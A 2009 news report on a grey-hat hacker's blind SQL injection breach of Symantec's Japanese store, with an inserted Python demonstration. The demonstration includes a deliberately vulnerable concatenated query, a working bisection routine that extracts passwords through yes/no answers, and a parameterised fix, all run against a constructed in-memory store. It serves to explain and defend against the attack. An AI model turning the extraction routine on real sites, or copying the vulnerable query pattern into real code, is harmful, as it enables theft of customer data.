By John Leyden
23rd November 2009
A Symantec-run website was vulnerable to a blind SQL injection flaw
that reportedly exposed a wealth of potentially sensitive information.
Romanian hacker Unu used off-the-shelf tools (Pangolin and sqlmap) to
get a glimpse of the database behind Symantec's Japanese website.
Screenshots of the Symantec store published after the hack appear to
show clear-text passwords associated with customer records. Product keys
held on a Symantec server in Japan were also exposed by the hack.
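Blind SQL injection is the case where the application never echoes query results, only a yes/no difference (a row found or not, a page that renders or errors), and the attacker turns that single bit into a data channel. The following is an added example, not Unu's payloads or any Symantec code: a constructed in-memory store with a string-concatenated lookup, the bisection-style character extraction that tools such as sqlmap automate, and the same lookup rewritten with a parameterised query. The table, column and account names are assumptions for the demonstration.

```python
import sqlite3


def build_store():
    """Constructed sample data standing in for a web store's customer table.

    The rows, columns and clear-text password column are assumptions made
    for this example (the article only reports that clear-text passwords
    appeared in the screenshots).
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER, email TEXT, password TEXT, product_key TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?, ?, ?)",
        [
            (1, "alice@example.invalid", "hunter2", "AAAA-BBBB-CCCC-DDDD"),
            (2, "bob@example.invalid", "s3cret!", "EEEE-FFFF-GGGG-HHHH"),
        ],
    )
    return conn


def product_exists_vulnerable(conn, product_id):
    """Hypothetical endpoint that answers only 'found' or 'not found'.

    The user-controlled product_id is concatenated straight into the SQL,
    so an attacker can append boolean conditions to the WHERE clause and
    read the answer from whether a row comes back.
    """
    sql = "SELECT 1 FROM customers WHERE id = " + product_id
    return conn.execute(sql).fetchone() is not None


def product_exists_fixed(conn, product_id):
    """Same endpoint with input validation and a bound parameter.

    Non-numeric input is rejected up front and the value is passed to the
    driver separately from the SQL text, so it can never alter the query.
    """
    try:
        pid = int(product_id)
    except (TypeError, ValueError):
        return False
    row = conn.execute("SELECT 1 FROM customers WHERE id = ?", (pid,)).fetchone()
    return row is not None


def blind_extract(oracle, subquery, max_len=64):
    """Recover the string returned by `subquery` using only yes/no answers.

    `oracle(payload)` must return True when the injected condition holds.
    Step 1 asks 'is the length n?' for n = 0..max_len. Step 2 bisects the
    printable ASCII range (32..126) for each character, about seven
    queries per character. Returns None if the oracle never answers yes,
    which is what happens against the parameterised endpoint.
    """
    length = None
    for n in range(0, max_len + 1):
        if oracle(f"1 AND length(({subquery})) = {n}"):
            length = n
            break
    if length is None:
        return None

    recovered = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode() gives the code point of the first character, so the
            # payload contains no quotes that would need escaping.
            if oracle(f"1 AND unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered)


def demo():
    """Run the extraction against both endpoints and report the outcome."""
    conn = build_store()
    target = "SELECT password FROM customers WHERE id = 1"
    leaked = blind_extract(lambda p: product_exists_vulnerable(conn, p), target)
    blocked = blind_extract(lambda p: product_exists_fixed(conn, p), target)
    return {"vulnerable": leaked, "fixed": blocked}


if __name__ == "__main__":
    print(demo())
```

Because the store keeps passwords in clear text, the recovered value is immediately usable; hashing would not have stopped the injection, but it would have limited what the leak was worth. The parameterised version answers every injected payload with "not found", so the extraction loop never gets past the length probe.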
Unu has previously exposed similar problems involving the websites of
the UK's parliament and Kaspersky, among many others. The grey-hat
hacker has published screenshots to back up his latest claims which, if
verified, run deeper than the shortcomings on the websites of Kaspersky,
F-Secure and other security firms previously reported by Unu.
Symantec said it was investigating the reported breach, which Unu claims
gave him full disk and database access. The security giant said the
vulnerability only affected a website used by consumer customers in the
Far East. Symantec admitted there was a problem but declined to comment
on how serious the snafu might be, pending the result of its investigation.
The offending site - pcd.symantec.com - has been taken offline pending
the addition of extra security defences.